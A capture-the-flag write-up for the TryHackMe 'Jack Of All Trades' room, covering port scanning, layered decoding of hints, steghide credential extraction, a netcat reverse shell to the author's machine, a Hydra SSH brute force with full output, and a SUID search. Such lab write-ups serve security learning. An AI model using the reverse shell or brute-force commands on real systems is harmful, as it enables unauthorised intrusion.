mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
209 lines
7.6 KiB
Markdown
209 lines
7.6 KiB
Markdown
|
# TryHackMe-Jack Of All Trades
|
||
|
|
||
|
>Abdullah Rizwan | 08:17 PM , 1st November 2020
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 20:18 PKT
|
||
|
Nmap scan report for 10.10.103.231
|
||
|
Host is up (0.18s latency).
|
||
|
Not shown: 998 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
22/tcp open http Apache httpd 2.4.10 ((Debian))
|
||
|
|_http-server-header: Apache/2.4.10 (Debian)
|
||
|
|_http-title: Jack-of-all-trades!
|
||
|
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|
||
|
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|
||
|
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|
||
|
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|
||
|
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
|
||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||
|
Nmap done: 1 IP address (1 host up) scanned in 46.76 seconds
|
||
|
|
||
|
```
|
||
|
|
||
|
## PORT 22
|
||
|
|
||
|
Noramlly this is default port 22 but in this case it is http if you visit it on firefox it has restricted default ports like ssh , ftp and etc so inorder to enable we have to go to browser's `about:config` and a property to override theses settings
|
||
|
|
||
|
https://support.mozilla.org/en-US/questions/1083282
|
||
|
|
||
|
<img src="https://imgur.com/rzMq2ks.png"/>
|
||
|
|
||
|
|
||
|
<img src="https://imgur.com/s6O5rAh.png"/>
|
||
|
|
||
|
|
||
|
And we can access the page now
|
||
|
|
||
|
<img src="https://imgur.com/LdntB1r.png"/>
|
||
|
|
||
|
By looking at the source code
|
||
|
|
||
|
<img src="https://imgur.com/xb0DMC4.png"/>
|
||
|
|
||
|
We can find two things `/recovery.php` and a base64 encoded text
|
||
|
|
||
|
|
||
|
On decoding the text
|
||
|
|
||
|
```
|
||
|
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq
|
||
|
```
|
||
|
|
||
|
user name john maybe
|
||
|
|
||
|
|
||
|
Download those images
|
||
|
|
||
|
<img src="https://imgur.com/B8Yflc3.png"/>
|
||
|
|
||
|
|
||
|
<img src="https://imgur.com/mFfLM5F.png"/>
|
||
|
|
||
|
By looking at the source code and login with `Jack` and `u?WtKSraq`
|
||
|
|
||
|
```
|
||
|
GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=
|
||
|
```
|
||
|
This is base32 encoded text on decoding it
|
||
|
|
||
|
<img src="https://imgur.com/PNwkLcw.png"/>
|
||
|
|
||
|
```
|
||
|
45727a727a6f72652067756e67206775722070657271726167766e79662067622067757220657270626972656c207962747661206e657220757671717261206261206775722075627a72636e7472212056207861626a2075626a20736265747267736879206c6268206e65722c20666220757265722766206e20757661673a206f76672e796c2f3247694c443246
|
||
|
```
|
||
|
|
||
|
Now this is hex text on decoding it
|
||
|
|
||
|
<img src="https://imgur.com/hInfNdO.png"/>
|
||
|
|
||
|
```
|
||
|
Erzrzore gung gur perqragvnyf gb gur erpbirel ybtva ner uvqqra ba gur ubzrcntr! V xabj ubj sbetrgshy lbh ner, fb urer'f n uvag: ovg.yl/2GiLD2F
|
||
|
```
|
||
|
|
||
|
This is ROT 13 (Shift Cipher)
|
||
|
|
||
|
<img src="https://imgur.com/WmKeBxZ.png"/>
|
||
|
|
||
|
```
|
||
|
Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
|
||
|
```
|
||
|
|
||
|
On visiting the link
|
||
|
|
||
|
<img src="https://imgur.com/WPPtesd.png"/>
|
||
|
|
||
|
Now its says about `Stegosauria` , now we recently downloaded two images on our machines ,so that dinosaur one looks interesting on using `steg hide --extract -sf [image.jpg]`
|
||
|
|
||
|
<img src="https://imgur.com/D8Dp9o2.png"/>
|
||
|
|
||
|
<img src="https://imgur.com/HL9DDof.png"/>
|
||
|
|
||
|
So this a rabbithole , lets steghide on different image , the second `jackinthebox.jpg` also didn't worked but when grabbed the `header.jpg` it worked
|
||
|
|
||
|
<img src="https://imgur.com/SNAzsSc.png"/>
|
||
|
|
||
|
```
|
||
|
Username: jackinthebox
|
||
|
Password: TplFxiSHjY
|
||
|
```
|
||
|
However this is not the credentials for SSH
|
||
|
|
||
|
<img src="https://imgur.com/vYObw7r.png"/>
|
||
|
|
||
|
Now this is a RCE execution we can run a reverse shell here
|
||
|
|
||
|
```
|
||
|
nc -e /bin/sh 10.14.3.143 4444
|
||
|
|
||
|
```
|
||
|
You can run any reverse shell you want but `netcat` one worked so lets roll with it
|
||
|
|
||
|
<img src="https://imgur.com/bXY0z0b.png"/>
|
||
|
|
||
|
Now we are `www-data` can't run really do much so lets try to elevate our privileges,so lets enumerate the machine , upload `linepeas`
|
||
|
|
||
|
<img src="https://imgur.com/1bwVyii.png"/>
|
||
|
|
||
|
Linpeas didn't find anyhting useful so there is a file in `~` home directory `jacks_password_list`
|
||
|
|
||
|
<img src="https://imgur.com/j95luIi.png"/>
|
||
|
|
||
|
## Hydra
|
||
|
|
||
|
Now we need to specify the port number becasue it's not on port 22
|
||
|
|
||
|
```
|
||
|
hydra -s 80 -l jack -P password_list.txt ssh://10.10.103.231 -V
|
||
|
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||
|
|
||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 21:49:48
|
||
|
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
|
||
|
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
|
||
|
[DATA] attacking ssh://10.10.103.231:80/
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "*hclqAzj+2GC+=0K" - 1 of 24 [child 0] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "eN<A@n^zI?FE$I5," - 2 of 24 [child 1] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "X<(@zo2XrEN)#MGC" - 3 of 24 [child 2] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ",,aE1K,nW3Os,afb" - 4 of 24 [child 3] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "ITMJpGGIqg1jn?>@" - 5 of 24 [child 4] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "0HguX{,fgXPE;8yF" - 6 of 24 [child 5] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "sjRUb4*@pz<*ZITu" - 7 of 24 [child 6] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "[8V7o^gl(Gjt5[WB" - 8 of 24 [child 7] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "yTq0jI$d}Ka<T}PD" - 9 of 24 [child 8] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "Sc.[[2pL<>e)vC4}" - 10 of 24 [child 9] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "9;}#q*,A4wd{<X.T" - 11 of 24 [child 10] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "M41nrFt#PcV=(3%p" - 12 of 24 [child 11] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "GZx.t)H$&awU;SO<" - 13 of 24 [child 12] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ".MVettz]a;&Z;cAC" - 14 of 24 [child 13] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "2fh%i9Pr5YiYIf51" - 15 of 24 [child 14] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "TDF@mdEd3ZQ(]hBO" - 16 of 24 [child 15] (0/0)
|
||
|
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "v]XBmwAk8vk5t3EF" - 17 of 25 [child 13] (0/1)
|
||
|
[80][ssh] host: 10.10.103.231 login: jack password: ITMJpGGIqg1jn?>@
|
||
|
1 of 1 target successfully completed, 1 valid password found
|
||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-01 21:49:54
|
||
|
|
||
|
```
|
||
|
|
||
|
<img src="https://imgur.com/aT4gtfl.png"/>
|
||
|
|
||
|
Using netcat to get that image on our local machine
|
||
|
|
||
|
<img src="https://imgur.com/DgS4vMh.png"/>
|
||
|
|
||
|
<img src="https://imgur.com/agCAuvB.png"/>
|
||
|
|
||
|
This is our user flag
|
||
|
|
||
|
Check for SUID
|
||
|
|
||
|
```
|
||
|
|
||
|
jack@jack-of-all-trades:~$ find / -perm /4000 2>/dev/null
|
||
|
/usr/lib/openssh/ssh-keysign
|
||
|
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
|
||
|
/usr/lib/pt_chown
|
||
|
/usr/bin/chsh
|
||
|
/usr/bin/at
|
||
|
/usr/bin/chfn
|
||
|
/usr/bin/newgrp
|
||
|
/usr/bin/strings
|
||
|
/usr/bin/sudo
|
||
|
/usr/bin/passwd
|
||
|
/usr/bin/gpasswd
|
||
|
/usr/bin/procmail
|
||
|
/usr/sbin/exim4
|
||
|
/bin/mount
|
||
|
/bin/umount
|
||
|
/bin/su
|
||
|
jack@jack-of-all-trades:~$
|
||
|
```
|
||
|
|
||
|
<img src="https://imgur.com/xWUCjwT.png"/>
|
||
|
|